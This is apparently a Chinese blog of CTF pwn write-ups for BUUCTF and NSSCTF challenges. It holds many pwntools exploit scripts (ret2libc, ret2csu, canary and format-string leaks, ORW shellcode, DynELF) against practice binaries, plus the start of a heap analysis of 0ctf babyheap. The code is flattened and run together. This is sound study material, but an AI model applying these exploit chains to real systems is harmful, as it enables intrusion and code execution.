本文最后更新于:6 个月前
栈 64位 ciscn_2019_s_3 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 from pwn import *'node4.buuoj.cn' ,27440 )'./ciscn_s_3' )'debug' 'main' ]0x040059A 0x0400580 0x004003a9 0x04004E2 0x0400517 b'/bin/sh\x00' + b'A' *0x8 + p64(main_addr)0x20 )8 ))print ('stack_addr-->' + hex (stack_addr))0x138 0x10 0x04005a3 b'/bin/sh\x00' + b'A' *0x8 + p64(rax_59_ret) + p64(csu_end)0 ) + p64(1 ) + p64(rax_59) + p64(0 ) + p64(0 ) + p64(0 )b'a' *0x38 ''' 调用execve需要 $rax==59 $rdi==“/bin/sh” $rsi==0 $rdx==0 syscall def ret_csu(r12, r13, r14, r15, last): payload = offset * 'a' #构造栈溢出的padding payload += p64(first_csu) + 'a' * 8 #gadgets1的地址 payload += p64(0) + p64(1) #rbx=0, rbp=1 payload += p64(r12) #call调用的地址 payload += p64(r13) + p64(r14) + p64(r15) #三个参数的寄存器 payload += p64(second_csu) #gadgets2的地址 payload += 'a' * 56 #pop出的padding payload += p64(last) #函数最后的返回地址 return payload
ret2csu
ciscn_2019_en_2 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 from pwn import *from LibcSearcher import *'linux' , arch='amd64' , log_level='debug' )0x4006b9 'pwn1' )"puts" ] 'puts' ]"main" ]0x400c83 'node4.buuoj.cn' ,25016 )b'a' * (0x50 + 8 )print (payload)'Input your choice!\n' , '1' )'Input your Plaintext to be encrypted\n' , payload)'Ciphertext\n' ) 7 )[:-1 ].ljust(8 ,b'\x00' ))print (puts_addr) 'puts' , puts_addr)'puts' ) 'system' ) 'str_bin_sh' ) b'a' * (0x50 + 8 )'Input your choice!\n' , '1' )'Input your Plaintext to be encrypted\n' , payload)
bjdctf_2020_babyrop 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 from pwn import *from LibcSearcher import *'debug' 'node4.buuoj.cn' ,28646 )'./pwn6' )'main' ]'puts' ]'puts' ]0x400733 b'a' *0x28 +p64(pop_ret)+p64(puts_got)+p64(puts_plt)+p64(main_addr)"Pull up your sword and tell me u story!" )6 ).ljust(8 ,b'\x00' ))'puts' ,puts_addr)'puts' ) 'system' ) 'str_bin_sh' )b'A' *0x28 +p64(pop_ret)+p64(bins)+p64(system)"Pull up your sword and tell me u story!" )
[HarekazeCTF2019]baby_rop2 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 from pwn import *'node4.buuoj.cn' ,25683 ) "../buu/[HarekazeCTF2019]baby_rop2" )'babyrop2' )"libc.so.6" )0x400733 0x400731 'main' ]'printf' ]'read' ]0x400770 b'M' *(0x20 +8 ) + p64(rdi_addr) + p64(format_str) + p64(rsi_r15_addr) + p64(read_got) + p64(0 ) + p64(printf_plt) + p64(main_addr)b'\x7f' )[-6 :].ljust(8 ,b'\x00' ))print ("read_addr: " + hex (read_addr))'read' ]'system' ]next (libc.search(b'/bin/sh' ))print ("system_addr: " + (hex (system_addr)))print ("bin_sh_addr: " + (hex (bin_sh_addr)))b'M' *(0x20 +8 ) + p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr)
[2021 鹤城杯]littleof checksec一下
发现有canary保护
ida查看
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 unsigned __int64 sub_4006E2 () char buf[8 ]; unsigned __int64 v3; 0x28 u);stdin ;puts ("Do you know how to do buffer overflow?" );0 , buf, 0x100 uLL);printf ("%s. Try harder!" , buf);0 , buf, 0x100 uLL);puts ("I hope you win" );return __readfsqword(0x28 u) ^ v3;
很显然栈溢出漏洞位于read函数中,buf大小为0x50,而read函数的第三参数,也就是输出/写入/输出 的最大的字节长度为0x100,就是2个buf大小的数据。但是本题开启了Canary,因此我们不能直接进行栈溢出以及Ret2Libc攻击。我们可以发现,我们输入的Payload会被第二段的printf打印出来。也就是说可以利用这个printf打印出来Canary,将Canary原封不动的归位,即可跳过检测。
canary
Canary是位于EBP之前的一串随机数据,用来防止栈上的内容溢出进行某些危险攻击的。我们都知道Canary 会在栈上添加一个随机值,以保护程序免受缓冲区溢出攻击,但是也会在栈上多占用一些空间。
也就是说:
假如我的 buf 大小为 0x50
如果是 64 位程序,那么 Canary 就会在栈上额外占用 0x08 的空间作为随机值。
也就是说 我的可用空间只有 0x42 。
开启 Canary : RBP 位于 0x50 + 0x08,Canary位于0x50 - 0x08,Return Address位于0x50 + 0x16
而 0x50 + 0x08 在不开启 Canary 的情况下是 Return Address 的地址
关闭 Canary : RBP 位于 0x50,Return Address位于0x50 + 0x08
这时候的 0x50 + 0x08 是 Return Address 的地址。
具体思路如下:
因为Canary是栈中的一个随机值,我们通过printf泄露Canary,然后将其填充至它本来应该在的位置,就能通过检查。
exp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 from pwn import *from LibcSearcher import *"littleof" )'debug' ,arch = 'amd64' ,os = 'linux' )0x400863 0x40059E 'puts' ]'puts' ]0x400789 b'A' * ( 0x50 - 0x08 )b'A' * 0x08 b'overflow?' )b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n' )7 ).rjust(8 , b'\x00' ))"Canary: " + (hex (Canary)))0x49 个字节,总共0x50 个字节,程序会把Canary放在变量起始位置,所以只需要接收7 个,然后用一个0 填充即可。b'Try harder!' ,Payload_Leak)b"\x7f" )[-6 :].ljust(8 ,b'\x00' ))"Real Address: " + (hex (addr)))0x080aa0 0x04f550 0x1b3e1a b'overflow?' )b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n' )7 ).rjust(8 , b'\x00' ))"Canary: " + (hex (Canary)))b'Try harder!' ,Payload_Shell)
Padding就是上文泄露Canary的Payload
Canary就是Canary的数据
Padding_Ret 代表覆盖原先栈上的 RBP
Ret 用来平衡栈帧
Rdi 用来存放 system 的第一个函数,也就是 /bin/sh 字符串的地址的。
jarvisoj_level3_x64 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 from pwn import *from LibcSearcher import *"./level3_x64" )'node4.buuoj.cn' ,28307 )'write' ]'write' ]'main' ]0x4006b3 0x4006b1 b'a' *(0x80 +8 )+p64(rdi)+p64(1 )+p64(rsi)+p64(write_got)+b'deadbeef' +p64(write_plt)+p64(main_addr)'\x7f' )[-6 :].ljust(8 , b'\x00' ))'write' ,write_addr)'write' )'system' )'str_bin_sh' )print (hex (write_addr))print (hex (libc_base))print (hex (system))print (hex (binsh))b'a' *(0x80 +8 )+p64(rdi)+p64(binsh)+p64(system)
[watevrCTF 2019]Voting Machine 1 1 2 3 4 5 6 7 8 from pwn import *'1.14.71.254' ,28014 )0x400807 b'a' *10 +p64(back_door)'Vote:' ,payload)print (flag)
[CISCN 2019东北]PWN2 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 from pwn import *from LibcSearcher import *'debug' ,os='linux' ,arch='amd64' )'1.14.71.254' ,28109 )'./pwn6' )b'choice!' )b'1' )'puts' ]'puts' ]0x00000000004006b9 0x0000000000400c83 'main' ]b'\x00' b'a' *0x57 'be encrypted' )'\x7f' )[-6 :].ljust(8 ,b'\x00' ))print (hex (puts_addr))'puts' ,puts_addr)'puts' ) 'system' ) 'str_bin_sh' )b'choice!' )str (1 ))'be encrypted' )b'\x00' +b'a' *0x57 +p64(ret)+p64(pop_rdi)+p64(bins)+p64(system)+p64(ret)
[深育杯 2021]find_flag 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 from pwn import * "find_flag" ) '1.14.71.254' ,28257 )b"name?" ) b"aa%12$p %17$p" ) b"aa" )str (p.recv(33 )).split()print (addr,can)int (can[0 :-1 ],16 )int (addr[2 :],16 )-0x215c "elf_base:" +hex (elf_base)) 0x1228 "canary:" +hex (can)) b"? " ) b'a' *(0x40 -8 ) + p64(can) + b'aaaaaaaa' +p64(flag_addr)
[2021 鹤城杯]easyecho https://blog.csdn.net/woodwhale/article/details/120680661
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 from pwn import "debug" 'node4.anna.nssctf.cn' ,28947 )"Name:" ,b"b" *15 +b"a" )"a" )6 ).ljust(8 , b'\x00' )) - 0xcf0 print ("addr" ,addr)]()0x202040 print ("flag_addr" ,flag_addr)b'a' *0x168 + p64(flag_addr)"Input:" ,"backdoor" )'Input: ' ,payload)'Input: ' ,'exitexit' )
[NISACTF 2022]ezpie 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 PIE保护机制只随机初始基地址,函数之间的偏移不会变from pwn import * '1.14.71.254' ,28123 ) 'pwn' ) 'main' ] 'shell' ] 'offest is :%x' %offest) b'gift!\n0x' ) int (p.recv(8 ).decode(),16 ) 'a' *40 ,'b' *4 ,p_shell_addr) 'Input:\n' ,payload)
[GFCTF 2021]where_is_shell 1 2 3 4 5 6 7 8 9 10 from pwn import *'./shell' )'1.14.71.254' ,28720 )0x400416 0x4005e3 0x400541 'system' ]b'b' *0x10 +b'b' *8 +p64(ret_addr)+p64(pop_rdi_ret)+p64(tips)+p64(system_addr)'find it?\n' ,payload)
bjdctf_2020_babyrop2 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 from pwn import *from LibcSearcher import *'debug' 'node4.buuoj.cn' ,26813 )'./bjdctf_2020_babyrop2' )0x0000000000400993 'puts' ]'puts' ]'vuln' ]"I'll give u some gift to help u!" )b'%7$p' )b'0x' )int (r.recv(16 ),16 )print ('[+]canary: ' ,hex (canary))b'a' *(0x20 -0x8 )+p64(canary)+b'b' *0x8 'Pull up your sword and tell me u story!' )6 ).ljust(8 ,b'\x00' ))'puts' ,puts_addr)'puts' )'system' )'str_bin_sh' )'Pull up your sword and tell me u story!' )b'a' *(0x20 -0x8 )+p64(canary)+b'b' *0x8
pwnable_orw 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 沙盒from pwn import *'node4.buuoj.cn' ,27085 )'debug' open ('flag' )'eax' ,'esp' ,42 )1 ,'esp' ,42 )"shellcode:" ,payload)''' 打开flag文件,sys_open(file,0,0);系统调用号为5 push 0x0 #字符串结尾 push 0x67616c66 #'flags' mov ebx,esp xor ecx,ecx #0 xor edx,edx #0 mov eax,0x5 #调用号 int 0x80 #sys_open(flags,0,0) 读flag文件,sys_read(3,file,0x100);系统调用号为3 mov eax,0x3; mov ecx,ebx; # ecx = char __user *buf 缓冲区,读出的数据-->也就是读“flag” mov ebx,0x3; # 文件描述符 fd:是文件描述符 0 1 2 3 代表标准的输出输入和出错,其他打开的文件 mov edx,0x100; #对应字节数 int 0x80; 输出flag文件内容,sys_write(1,file,0x30);系统调用号为4 mov eax,0x4; # eax = sys_write mov ebx,0x1; # ebx = unsigned int fd = 1 int 0x80; '''
32位 get_started_3dsctf_2016 checksec
1 2 3 4 5 Arch: i386-32-little
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 int __cdecl main (int argc, const char **argv, const char **envp) char v4[56 ]; printf ("Qual a palavrinha magica? " , v4[0 ]);gets (v4);return 0 ;void __cdecl get_flag (int a1, int a2) int v2; unsigned __int8 v3; int v4; unsigned __int8 v5; if ( a1 == 0x308CD64F && a2 == 425138641 )fopen ("flag.txt" , "rt" );getc (v2);if ( v3 != 255 )char )v3;do putchar (v4);getc (v2);char )v5;while ( v5 != 255 );fclose (v2);
get_flag()有两个参数,a1和a2。这里我已经将a1和a2转换成了十六进制。if对a1和a2进行了一个判断,符合条件后进行对flag的读取。具体读取过程为:首先v2对flag.txt文件进行一个读取,v3用getc()来接收v2读取的值(getc():从指定的流stream获取下一个字符(一个无符号字符),并把位置标识符往前移动)。在v3不为255时,将值传给v4,用中间变量v5来读取v2的值,并且在v5不为255时,将v5的值赋给v4并输出v4,最终输出的结果就是flag
但是我们发现通过main()的stackoverflow单纯的跳到get_flag()这个函数是无法拿到flag的,这里是因为我们在stackoverflow时覆盖了a1和a2,破坏了输出flag的条件,从而无法得到flag。我们试想,如果我们在stackoverflow时保护了栈结构,使程序达到输出flag的条件,正常退出,是否就可以拿到flag?
于是我们需要exit()的地址,以及满足条件的a1和a2的值,即0x308CD64F和0x195719D1
exp
1 2 3 4 5 6 7 8 9 10 11 12 from pwn import *"linux" , arch = "i386" , log_level = "debug" )'./pwn1' )'node4.buuoj.cn' ,27026 )0x08048196 'exit' ]"got exit addr : %s" % hex (exits))b"a" * 0x38 + p32(0x080489A0 ) + p32(exits) + p32(0x308CD64F )+ p32(0x195719D1 )"Qual a palavrinha magica? " , timeout = 0.5 )
[OGeek2019]babyrop 先checksec一下,nx排除了shellcode的可能,Full RELEO为地址随机化
先观察主函数,设定了一个闹钟(但是这道题不需要使用解除闹钟的方法)
主函数的思路是生成一个随机数,把这个随机数作为参数传进sub——804871F()函数中,然后再将函数返回结果作为参数传进sub——80487D0()里,sub_80486bb()是初始化,没什么用。fd=open(“/dev/urandom”,0);if(fd>0) read(fd,&buf,4u) :获取一个随机数给到buf
sub_804871f()
sprintf函数将生成的随机数加到s[32]的数组中,这里题目有read函数,但是没有栈溢出的可能,读入buf之后,读取buf的长度,然后比较buf和s字符串的大小(比较长度为前v1个字符)。此时如果strncmp()的结果不为0,则直接退出程序。因此我们第一个目的:使strncmp结果为0
sub_80487d0()
这个函数将buf[7]作为参数出传进来,将它的ASCII码比对,看到全程序中唯一一个存在栈溢出漏洞可能性的地方。但是必须满足a1的ASCII码值能达到栈溢出的大小。第二个目的:使a1的ASCII码值(sub_804871F()函数里的buf[7]的ASCII码值尽量大)
思路
使用ROP链寻找libc解题
首先让strncmp结果为零,当buf与s数组完全相同时,strncmp结果会为0,但是s为系统生成的随机数,而buf是我们输入的数据,两者显然不可能相等。另一种办法就是使v1等于0,这样strncmp的结果仍为0。 而v1是strlen函数读取buf的长度大小,使他为0就很简单了,标准的长度检测绕过,让buf数组的第一位为‘\x00’ 即可。此时程序不会退出
然后让buf[7]的值尽可能大,要实现栈溢出,buf[7]元素的ASCII码值必须大于两百四十多才行,所以要使用转义字符的ASCii码,’'为转义字符,而’\xhh‘表示ASCII码值与’hh’这个十六进制数相等的符号,例如’\xff’表示ASCII码为255的符号。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 from pwn import *"./pwn" )'node4.buuoj.cn' ,25352 )"./pwn" )"libc-2.23.so" )"debug" ,arch="i386" )"write" ]'''选择用write函数泄露libc地址''' "read" ]0x08048825 b"\x00" 长度检测绕过+ b"\xff" *7 让buf[7 ]的值尽可能大,\为转义字符,而’\xhh‘表示ASCII码值与’hh’这个十六进制数相等的符号,例如’\xff’表示ASCII码为255 的符号。b"a" *0xE7 ,b"b" *4 ,write_plt,main_func,1 ,read_got,0x8 ])4 ))print (read_addr)"read" ]"system" ]next (libc.search(b"/bin/sh" ))print (binsh)b"a" *0xe7 ,b"b" *4 ,system_addr,0 ,binsh])
not_the_same_3dsctf_2016 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 from pwn import *"./not_the_same_3dsctf_2016" )"node4.buuoj.cn" ,28787 )"./not_the_same_3dsctf_2016" )0x080489A0 0x080ECA2D 0x0804F0A0 'write' ]'exit' ]print (hex (write_addr))4 字节的ebp0x2D * b'a' + p32(backdoor_addr) + p32(write_addr) + p32(exit_addr) + p32(1 ) + p32(str_flag_addr) + p32(45 )1 ) 42 )
铁人三项(第五赛区)_2018_rop 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 from pwn import * from LibcSearcher import * 'linux' ,arch = 'i386' ,log_level = 'debug' )'./2018_rop' )'node4.buuoj.cn' ,25020 )'main' ]'write' ]'write' ]b'a' *(0x88 +0x4 ) + p32(plt_write_addr) + p32(main_addr) + p32(1 ) + p32(got_write_addr) + p32(4 )4 ))print (hex (write_addr))'write' ,write_addr)'write' )'system' )'str_bin_sh' )b'a' *(0x88 +0x4 ) + p32(system_addr) + b'aaaa' + p32(bin_addr)
ciscn_2019_es_2 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 from pwn import *"linux" ,arch="i386" ,log_level="debug" )'pwn8' )'node4.buuoj.cn' ,29794 )0x08048400 0x8048562 b'a' *0x27 'name?\n' ,payload1)'\n' )4 ))b'a' *4 +p32(sys_addr)+p32(0 )+p32(ebp-0x28 )+b'/bin/sh' 0x28 ,b'\0' )0x38 )看当时的ebp+p32(leave_addr)
pwn2_sctf_2016 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 整数溢出问题from pwn import *from LibcSearcher import *'node4.buuoj.cn' ,29476 )'./pwn9' )'printf' ]'printf' ]0x0804852f 0x080485b8 'read?' )str (-1 ))'data!\n' )b'a' *0x30 +p32(printf_plt)+p32(vuln)+p32(printf_got)'\n' )4 ))print (hex (printf_add))'printf' ,printf_add)'printf' )'system' )'str_bin_sh' )'read?' )str (-1 ))'data!\n' )b'a' *0x30 +p32(system)+p32(main)+p32(binsh)
jarvisoj_level3 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 32 位ret2libcfrom pwn import *from LibcSearcher import *'debug' 'node4.buuoj.cn' ,25837 )'./level3' )'write' ]'write' ]0x0804844B b'a' *0x88 + b'b' *4 + p32(write_plt) + p32(main_addr) + p32(1 ) + p32(write_got) + p32(4 )"Input:\n" ,payload)4 ))print (hex (write_addr))'write' ,write_addr)'write' )'system' )'str_bin_sh' )b'a' *0x88 + b'b' *4 + p32(system_addr) + p32(main_addr) + p32(bin_sh)"Input:\n" ,payload)
jarvisoj_level4 学到一个新方法
当题目未提供libc.so的时候,可以使用DynELF寻找我们需要函数的地址,DynELF是通过它有的各种libc.so去爆破该ELF的libc.so。所以需要一个leak函数支持多次的write函数之类的功能,leak的参数addr 是我们需要用write写出数据的地址函数内写/接受 4字节8字节都行 返回不需要u32(data) 直接返回data。DynELF(leak,elf=elf) 第一个参数就是leak函数 第二个参数是你的程序elf,之后使用lookup(“function_name”,”libc”) function_name就是需要查询的函数真实地址 返回为int,还有一点就是 leak里面返回main有时候行不通 估计是堆栈的原因所以返回start 把所有东西全清空改题构造leak之后 找到system地址通过read 把”/bin/sh”读到data段 (一般是bss段,不过这里bss段太短了装不下,所以找可执行的data段)注意read的使用要严格控制字符数 也就是第三个参数最开始这里使用了io.sendline(“/bin/sh\x00”)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 from pwn import *'node4.buuoj.cn' ,28208 )'./level4' )0x08048350 0x08048340 0x08048310 def leak (addr ):b'a' *(0x88 +4 )+p32(write_plt)+p32(start_addr)1 )+p32(addr)+p32(8 )8 ) return leaked'system' ,'libc' )print ("system_addr:" +hex (system_addr))0x0804A01C b'a' *(0x88 +4 )+p32(read_plt)+p32(start_addr)0 )+p32(data_addr)+p32(8 )"/bin/sh\x00" )b'a' *(0x88 +4 )+p32(system_addr)+p32(start_addr)
泄露还可以用LibcSearcher 只要得到一个函数的真实地址,就可以dump出libc地址然后类似于给出了libc一样计算base_addr 继而计算其他函数的真实地址两种方法都可能得到错误的libc.so ,这道题,我用LibcSearcher就打不通
ez_pz_hackover_2016 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ''' 调试脚本 from pwn import * context(log_level = 'debug',os='linux',arch='i386') p = process('./ez') gdb.attach(p) p.recvuntil('crash: ') stack_addr = int(p.recv(10), 16) payload = b'crashme\x00' + b'a'*18 payload += p32(0) + asm(shellcraft.sh()) p.recvuntil('> ') p.sendline(payload) pause() p.interactive() '''
1 2 3 4 5 6 7 8 9 10 11 12 13 from pwn import *'debug' 'node4.buuoj.cn' ,25049 )'lets crash: ' )int (p.recv(10 ),16 )28 b'crashme\x00' .ljust(26 ,b"\x00" )'>' )
picoctf_2018_rop chain 1 2 3 4 5 6 7 8 9 10 11 12 from pwn import *'linux' ,arch='i386' ,log_level='debug' )'node4.buuoj.cn' ,27550 )'./rop_chain' )'flag' ]'win_function1' ]'win_function2' ]0xBAAAAAAD 0xDEADBAAD b'a' *(0x18 +4 )+p32(win1_addr)+p32(win2_addr)+p32(flag_addr)+p32(win2_a1)+p32(flag_a1)
[HUBUCTF 2022 新生赛]fmt 这道题实现了BROP的思想,利用格式化字符串漏洞泄露目标程序的栈中的信息,并通过多次利用格式化字符串漏洞,逐步获取flag。遇到的很少所以记录一下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 from pwn import *'node2.anna.nssctf.cn' ,28231 )'./fmt' )def get_flag (k ):b'service' ,k)b'0x' )1 ][::-1 ]'' for i in range (0 ,len (a),2 ):chr (int (a[i:i+2 ][::-1 ],16 ))return f'' for i in range (12 ,20 ):b'%' +str (i).encode()+b'$p' )print ('flag=' +flag)
get_flag函数接受一个参数 k,向目标程序发送一个字符串(请求),并根据目标程序的响应获取 flag 的值。在这个函数中,先将 k 发送给目标程序,然后获取响应中 0x 开头的字符串(栈中地址),将该字符串逆序([::-1])后截断去掉换行符,再按照每两个字符转换成相应的 ascii 码,并组成新的字符串 f 返回。
for 循环从 12 到 19,每次将一个参数中的某一个参数设置成 fmt 字符串的参数位置(如12$p’、13$p’),然后调用 get_flag() 函数获取返回值,并将返回值添加到 flag 中。
[2021 鹤城杯]babyof 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 from pwn import *'1.14.71.254' ,28597 )'libc-2.27.so' )'babyof' )0x0000000000400506 0x0000000000400743 'puts' ]'puts' ]0x40066B "?" )b'a' *0x40 + p64(0 ) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) +p64(main)'\x7f' )[-6 :].ljust(8 ,b'\x00' )) - libc.sym['puts' ]0x00000000001b3e1a 'system' ]"?" )b'a' *0x40 + p64(0 ) + p64(ret) +p64(pop_rdi) + p64(binsh) + p64(system)
[WUSTCTF 2020]getshell2 tips: p32(system_plt) + p32(0) + p32(str_binsh) 可以替换成 p32(call_system) + p32(str_sh)
1 2 3 4 5 6 from pwn import *'node3.anna.nssctf.cn' ,28711 )'./service' )b'a' *0x1c + p32(0x08048529 ) + p32(next (elf.search(b'sh\x00' )))
堆 0ctf_2017_babyheap 前言:buu刷题遇到到第一道堆题,是我刷题到目前为止遇到到最大的挑战,我也是看了很多wp才逐渐理解这道题的思路,希望可以慢慢前进吧
分析: 静态分析 1.chesksec查看保护机制: 1 2 3 4 5 6 [*] '/home/fanfan/pwn challenges/heap/babyheap_0ctf_2017'
保护全开,那必然就要想办法泄漏出 libc 基地址的偏移量来实现调用其他函数
2.运行程序: 1 2 3 4 5 6 ===== Baby Heap in 2017 =====
菜单题,几个功能分别是分配、填充、释放和输出
3.拖入 IDA 64bit 分析: main
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 __int64 __fastcall main (__int64 a1, char **a2, char **a3) char *v4; while ( 1 )switch ( get_number() )case 1LL :break ;case 2LL :break ;case 3LL :break ;case 4LL :break ;case 5LL :return 0LL ;default :continue ;
然后看一下sub_B70()函数(为了便于分析,我已经将其中有些匿名函数重命名了)
sub_B70()
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 char *sub_B70 () int fd; char *addr; unsigned __int64 v3; 4 ]; 3 ] = __readfsqword(0x28 u);stdin , 0LL , 2 , 0LL );0LL , 2 , 0LL );0x3C u);puts ("===== Baby Heap in 2017 =====" );"/dev/urandom" , 0 );if ( fd < 0 || read(fd, buf, 0x10 uLL) != 16 )exit (-1 );char *)((buf[0 ] % 0x555555543000 uLL + 0x10000 ) & 0xFFFFFFFFFFFFF000 LL);1 ] % 0xE80 uLL) & 0xFFFFFFFFFFFFFFF0 LL;if ( mmap(addr, 0x1000 uLL, 3 , 34 , -1 , 0LL ) != addr )exit (-1 );return &addr[v3];
有个mmp函数,整个函数就是获取一块空间
mmp函数:将硬盘上的一块区域映射为虚拟内存
void *mmap(void addr, size_t length, int prot, int flags, int fd, off_t offset); 创建共享内存映射
参数:
addr: 指定映射区的首地址。通常传NULL,表示让系统自动分配
length:共享内存映射区的大小。(<= 文件的实际大小,通常为文件大小)
prot: 共享内存映射区的读写属性。PROT_READ(读)、PROT_WRITE(写)、PROT_READ|PROT_WRITE(读写)
flags: 标注共享内存的共享属性。
MAP_SHARED(共享,会将映射区所做的操作反映到物理设备(磁盘)上。) MAP_PRIVATE(私有,映射区所做的修改不会反映到物理设备。 )
fd: 用于创建共享内存映射区的那个文件的 文件描述符.
offset:默认0,表示映射文件全部。偏移位置。需是 4k 的整数倍。
返回值: 成功:映射区的首地址。
失败:MAP_FAILED (void(-1)), error
接下来看一下菜单里的各个函数
1.allocate
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 void __fastcall add (__int64 a1) int i; int number; void *v3; for ( i = 0 ; i <= 15 ; ++i )if ( !*(_DWORD *)(24LL * i + a1) )printf ("Size: " );if ( number > 0 )if ( number > 4096 )4096 ;calloc (number, 1uLL );if ( !v3 )exit (-1 );24LL * i + a1) = 1 ;24LL * i + 8 ) = number;24LL * i + 16 ) = v3;printf ("Allocate Index %d\n" , (unsigned int )i);return ;
void *calloc(size_t nitems, size_t size) 分配所需的内存空间,并返回一个指向它的指针。malloc 和 calloc 之间的不同点是,malloc 不会设置内存为零,而 calloc 会设置分配的内存为零。
参数
nitems – 要被分配的元素个数。
size – 元素的大小
返回值
该函数返回一个指针,指向已分配的内存。如果请求失败,则返回 NULL。
该函数大概就是申请一块size内存,将内存信息写入,简单化一下结构图:
2.FILL(存在漏洞!)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 __int64 __fastcall edit (__int64 a1) int v2; int v3; printf ("Index: " );if ( (unsigned int )result <= 0xF )unsigned int *)(24LL * (int )result + a1);if ( (_DWORD)result == 1 )printf ("Size: " );if ( (int )result > 0 )printf ("Content: " );return sub_11B2(*(_QWORD *)(24LL * v2 + a1 + 16 ), v3);return result;
这个函数大致上就是堆idx的块设置size,并填入context
这里就出现一个问题,在Allcate中我们输入size申请一块大小size大小的内存,但是Fill函数又让我们输入一遍size,然后读size大小的数据到该区域指向的内存空间。这存在很大问题,若我们fill输入size无限大,就可以把堆撑爆,存在漏洞!
3.Free
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 __int64 __fastcall sub_F50 (__int64 a1) int v2; printf ("Index: " );if ( (unsigned int )result <= 0xF )unsigned int *)(24LL * (int )result + a1);if ( (_DWORD)result == 1 )24LL * v2 + a1) = 0 ;24LL * v2 + a1 + 8 ) = 0LL ;free (*(void **)(24LL * v2 + a1 + 16 ));24LL * v2 + a1;16 ) = 0LL ;return result;
释放idx的块,将该区域使用位置为0,并将指针指为0,即指针跟着释放
4.Dump
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 int __fastcall show (__int64 a1) int result; int v2; printf ("Index: " );if ( (unsigned int )result <= 0xF )24LL * result + a1);if ( result == 1 )puts ("Content: " );24LL * v2 + a1 + 16 ), *(_QWORD *)(24LL * v2 + a1 + 8 ));return puts (byte_14F1);return result;
打印idx的块内容
利用思路 漏洞分析 fill中的size可以重新设置,故可以造成堆溢出。
使用两次double free与fastbin attack,通过unsorted bin的特性,若unsorted bin中只有一个chunk的时候,这个chunk的fd和bk指针存放的都是main_arena+88,我们可以这获得libc的基地址
获取libc的基址 libc的基址通过unsorted bin的特性获得,只要申请一块较大的chunk,并free掉,该chunk的fd和bk地址便可用来计算。因此我们要获得被free掉的chunk内容,而dump函数就算输出chunk内容。因此要使得两个指针指向同一个较大的chunk块,将其中一个指针chunk释放,另一个使用dump获取地址内存
动态调试 根据题目情况构造好交互函数 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 from pwn import *from LibcSearcher import *'./babyheap_0ctf_2017' )def debug ():def allo (size ):"Command: " )str (1 ))"Size: " )str (size))def fill (idx,size,content ):"Command: " )str (2 ))"Index: " )str (idx))"Size: " )str (size))"Content: " )def free (idx ):"Command: " )str (3 ))"Index: " )str (idx))def dump (idx ):"Command: " )str (4 ))"Index: " )str (idx))
首先申请初始块 1 2 3 4 5 allo(0x10 )0x10 )0x10 )0x10 )0x80 )
这里遇到了些许版本问题,因为2.23libc版本中没有tcachebins,但是我的ubuntu的libc版本是2.26的,所以本地动态调试的时候会出现不同.于是我就学习了一下怎样更换elf文件的glibc,这里简单记一下,需要的两个工具:patchelf和glibc-all-in-one
安装完毕后,首先使用glibc-all-in-one现在题目对应的gilbc
./download (cat list后所显示的gilbc各种版本中所需要的版本)
